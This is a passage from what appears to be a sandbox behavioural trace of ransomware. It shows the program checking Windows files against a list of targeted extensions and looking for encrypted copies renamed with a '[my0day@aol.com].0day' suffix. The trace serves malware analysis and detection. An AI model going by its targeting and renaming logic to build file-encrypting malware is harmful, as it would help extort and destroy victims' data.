lpFileSize=0x2aaff1c*=727) returned 1 [0266.754] CloseHandle (hObject=0x308) returned 1 [0266.754] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml")) returned 0x20 [0266.754] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.754] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0266.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0266.754] lstrlenW (lpString=".doc") returned 4 [0266.754] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.754] lstrlenW (lpString=".docx") returned 5 [0266.754] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0266.755] lstrlenW (lpString=".pdf") returned 4 [0266.755] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.755] lstrlenW (lpString=".xls") returned 4 [0266.755] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.755] lstrlenW (lpString=".xlsx") returned 5 [0266.755] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0266.755] lstrlenW (lpString=".ppt") returned 4 [0266.755] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0266.755] lstrlenW (lpString=".zip") returned 4 [0266.755] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.755] lstrlenW (lpString=".rar") returned 4 [0266.755] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.755] lstrlenW (lpString=".bz2") returned 4 [0266.755] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.755] lstrlenW (lpString=".7z") returned 3 [0266.755] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0266.755] lstrlenW (lpString=".dbf") returned 4 [0266.755] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0266.755] lstrlenW (lpString=".1cd") returned 4 [0266.755] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0266.755] lstrlenW (lpString=".jpg") returned 4 [0266.755] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0266.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0266.756] lstrlenW (lpString=".doc") returned 4 [0266.756] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.756] lstrlenW (lpString=".docx") returned 5 [0266.756] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0266.756] lstrlenW (lpString=".pdf") returned 4 [0266.756] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.756] lstrlenW (lpString=".xls") returned 4 [0266.756] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.756] lstrlenW (lpString=".xlsx") returned 5 [0266.756] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0266.756] lstrlenW (lpString=".ppt") returned 4 [0266.756] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0266.756] lstrlenW (lpString=".zip") returned 4 [0266.756] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.756] lstrlenW (lpString=".rar") returned 4 [0266.756] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.756] lstrlenW (lpString=".bz2") returned 4 [0266.756] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.756] lstrlenW (lpString=".7z") returned 3 [0266.756] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0266.757] lstrlenW (lpString=".dbf") returned 4 [0266.757] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0266.757] lstrlenW (lpString=".1cd") returned 4 [0266.757] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0266.757] lstrlenW (lpString=".jpg") returned 4 [0266.757] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.757] lstrcmpiW (lpString1=".emf", lpString2=".0day") returned 1 [0266.757] lstrlenW (lpString="Memo.emf") returned 8 [0266.757] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.350] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=152300) returned 1 [0267.350] CloseHandle (hObject=0x2f8) returned 1 [0267.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf")) returned 0x20 [0267.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0267.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0267.351] lstrlenW (lpString=".doc") returned 4 [0267.351] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0267.351] lstrlenW (lpString=".docx") returned 5 [0267.351] lstrcmpiW (lpString1=".docx", lpString2="o.emf") returned -1 [0267.351] lstrlenW (lpString=".pdf") returned 4 [0267.351] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0267.351] lstrlenW (lpString=".xls") returned 4 [0267.351] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0267.351] lstrlenW (lpString=".xlsx") returned 5 [0267.351] lstrcmpiW (lpString1=".xlsx", lpString2="o.emf") returned -1 [0267.351] lstrlenW (lpString=".ppt") returned 4 [0267.351] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0267.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0267.351] lstrlenW (lpString=".zip") returned 4 [0267.351] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0267.351] lstrlenW (lpString=".rar") returned 4 [0267.351] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0267.351] lstrlenW (lpString=".bz2") returned 4 [0267.351] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0267.351] lstrlenW (lpString=".7z") returned 3 [0267.351] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0267.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0267.352] lstrlenW (lpString=".dbf") returned 4 [0267.352] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0267.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0267.352] lstrlenW (lpString=".1cd") returned 4 [0267.352] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0267.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0267.352] lstrlenW (lpString=".jpg") returned 4 [0267.352] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0267.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0267.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0267.352] lstrlenW (lpString=".doc") returned 4 [0267.352] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0267.352] lstrlenW (lpString=".docx") returned 5 [0267.352] lstrcmpiW (lpString1=".docx", lpString2="o.emf") returned -1 [0267.352] lstrlenW (lpString=".pdf") returned 4 [0267.352] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0267.352] lstrlenW (lpString=".xls") returned 4 [0267.352] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0267.352] lstrlenW (lpString=".xlsx") returned 5 [0267.352] lstrcmpiW (lpString1=".xlsx", lpString2="o.emf") returned -1 [0267.352] lstrlenW (lpString=".ppt") returned 4 [0267.352] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0267.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0267.352] lstrlenW (lpString=".zip") returned 4 [0267.352] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0267.352] lstrlenW (lpString=".rar") returned 4 [0267.352] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0267.352] lstrlenW (lpString=".bz2") returned 4 [0267.352] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0267.352] lstrlenW (lpString=".7z") returned 3 [0267.352] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0267.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0267.353] lstrlenW (lpString=".dbf") returned 4 [0267.353] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0267.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0267.353] lstrlenW (lpString=".1cd") returned 4 [0267.353] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0267.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0267.353] lstrlenW (lpString=".jpg") returned 4 [0267.353] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0267.353] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0267.353] lstrlenW (lpString="Pine_Lumber.jpg") returned 15 [0267.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.353] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3981) returned 1 [0267.353] CloseHandle (hObject=0x2f8) returned 1 [0267.353] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg")) returned 0x20 [0267.353] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0267.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0267.353] lstrlenW (lpString=".doc") returned 4 [0267.353] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0267.353] lstrlenW (lpString=".docx") returned 5 [0267.353] lstrcmpiW (lpString1=".docx", lpString2="r.jpg") returned -1 [0267.353] lstrlenW (lpString=".pdf") returned 4 [0267.354] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0267.354] lstrlenW (lpString=".xls") returned 4 [0267.354] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0267.354] lstrlenW (lpString=".xlsx") returned 5 [0267.354] lstrcmpiW (lpString1=".xlsx", lpString2="r.jpg") returned -1 [0267.354] lstrlenW (lpString=".ppt") returned 4 [0267.354] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0267.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0267.354] lstrlenW (lpString=".zip") returned 4 [0267.354] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0267.354] lstrlenW (lpString=".rar") returned 4 [0267.354] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0267.354] lstrlenW (lpString=".bz2") returned 4 [0267.354] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0267.354] lstrlenW (lpString=".7z") returned 3 [0267.354] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0267.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0267.354] lstrlenW (lpString=".dbf") returned 4 [0267.354] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0267.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0267.354] lstrlenW (lpString=".1cd") returned 4 [0267.354] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0267.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0267.354] lstrlenW (lpString=".jpg") returned 4 [0267.354] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0267.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0267.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0267.354] lstrlenW (lpString=".doc") returned 4 [0267.354] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0267.354] lstrlenW (lpString=".docx") returned 5 [0267.354] lstrcmpiW (lpString1=".docx", lpString2="r.jpg") returned -1 [0267.354] lstrlenW (lpString=".pdf") returned 4 [0267.354] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0267.354] lstrlenW (lpString=".xls") returned 4 [0267.355] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0267.355] lstrlenW (lpString=".xlsx") returned 5 [0267.355] lstrcmpiW (lpString1=".xlsx", lpString2="r.jpg") returned -1 [0267.355] lstrlenW (lpString=".ppt") returned 4 [0267.355] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0267.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0267.355] lstrlenW (lpString=".zip") returned 4 [0267.355] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0267.355] lstrlenW (lpString=".rar") returned 4 [0267.355] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0267.355] lstrlenW (lpString=".bz2") returned 4 [0267.355] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0267.355] lstrlenW (lpString=".7z") returned 3 [0267.355] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0267.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0267.355] lstrlenW (lpString=".dbf") returned 4 [0267.355] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0267.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0267.355] lstrlenW (lpString=".1cd") returned 4 [0267.355] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0267.355] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 73 [0267.355] lstrlenW (lpString=".jpg") returned 4 [0267.355] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0267.355] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0267.355] lstrlenW (lpString="Pretty_Peacock.jpg") returned 18 [0267.355] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.356] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=5115) returned 1 [0267.356] CloseHandle (hObject=0x2f8) returned 1 [0267.356] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg")) returned 0x20 [0267.356] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.356] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0267.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0267.356] lstrlenW (lpString=".doc") returned 4 [0267.356] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0267.356] lstrlenW (lpString=".docx") returned 5 [0267.356] lstrcmpiW (lpString1=".docx", lpString2="k.jpg") returned -1 [0267.356] lstrlenW (lpString=".pdf") returned 4 [0267.356] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0267.356] lstrlenW (lpString=".xls") returned 4 [0267.356] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0267.356] lstrlenW (lpString=".xlsx") returned 5 [0267.356] lstrcmpiW (lpString1=".xlsx", lpString2="k.jpg") returned -1 [0267.356] lstrlenW (lpString=".ppt") returned 4 [0267.356] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0267.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0267.356] lstrlenW (lpString=".zip") returned 4 [0267.356] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0267.356] lstrlenW (lpString=".rar") returned 4 [0267.356] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0267.356] lstrlenW (lpString=".bz2") returned 4 [0267.357] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0267.357] lstrlenW (lpString=".7z") returned 3 [0267.357] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0267.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0267.357] lstrlenW (lpString=".dbf") returned 4 [0267.357] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0267.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0267.357] lstrlenW (lpString=".1cd") returned 4 [0267.357] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0267.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0267.357] lstrlenW (lpString=".jpg") returned 4 [0267.357] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0267.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0267.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0267.357] lstrlenW (lpString=".doc") returned 4 [0267.357] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0267.357] lstrlenW (lpString=".docx") returned 5 [0267.357] lstrcmpiW (lpString1=".docx", lpString2="k.jpg") returned -1 [0267.357] lstrlenW (lpString=".pdf") returned 4 [0267.357] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0267.358] lstrlenW (lpString=".xls") returned 4 [0267.358] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0267.358] lstrlenW (lpString=".xlsx") returned 5 [0267.358] lstrcmpiW (lpString1=".xlsx", lpString2="k.jpg") returned -1 [0267.358] lstrlenW (lpString=".ppt") returned 4 [0267.358] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0267.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0267.358] lstrlenW (lpString=".zip") returned 4 [0267.358] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0267.358] lstrlenW (lpString=".rar") returned 4 [0267.358] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0267.358] lstrlenW (lpString=".bz2") returned 4 [0267.358] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0267.358] lstrlenW (lpString=".7z") returned 3 [0267.358] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0267.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0267.358] lstrlenW (lpString=".dbf") returned 4 [0267.358] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0267.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0267.358] lstrlenW (lpString=".1cd") returned 4 [0267.358] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0267.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 76 [0267.358] lstrlenW (lpString=".jpg") returned 4 [0267.358] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0267.358] lstrcmpiW (lpString1=".jpg", lpString2=".0day") returned 1 [0267.358] lstrlenW (lpString="Psychedelic.jpg") returned 15 [0267.358] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.359] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=14049) returned 1 [0267.359] CloseHandle (hObject=0x2f8) returned 1 [0267.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg")) returned 0x20 [0267.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.359] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0267.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0267.360] lstrlenW (lpString=".doc") returned 4 [0267.360] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0267.360] lstrlenW (lpString=".docx") returned 5 [0267.360] lstrcmpiW (lpString1=".docx", lpString2="c.jpg") returned -1 [0267.360] lstrlenW (lpString=".pdf") returned 4 [0267.360] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0267.360] lstrlenW (lpString=".xls") returned 4 [0267.360] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0267.360] lstrlenW (lpString=".xlsx") returned 5 [0267.360] lstrcmpiW (lpString1=".xlsx", lpString2="c.jpg") returned -1 [0267.360] lstrlenW (lpString=".ppt") returned 4 [0267.360] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0267.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0267.360] lstrlenW (lpString=".zip") returned 4 [0267.360] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0267.360] lstrlenW (lpString=".rar") returned 4 [0267.360] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0267.360] lstrlenW (lpString=".bz2") returned 4 [0267.360] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0267.360] lstrlenW (lpString=".7z") returned 3 [0267.360] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0267.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0267.360] lstrlenW (lpString=".dbf") returned 4 [0267.360] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0267.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 73 [0267.360] lstrlenW (lpString=".1cd") returned 4 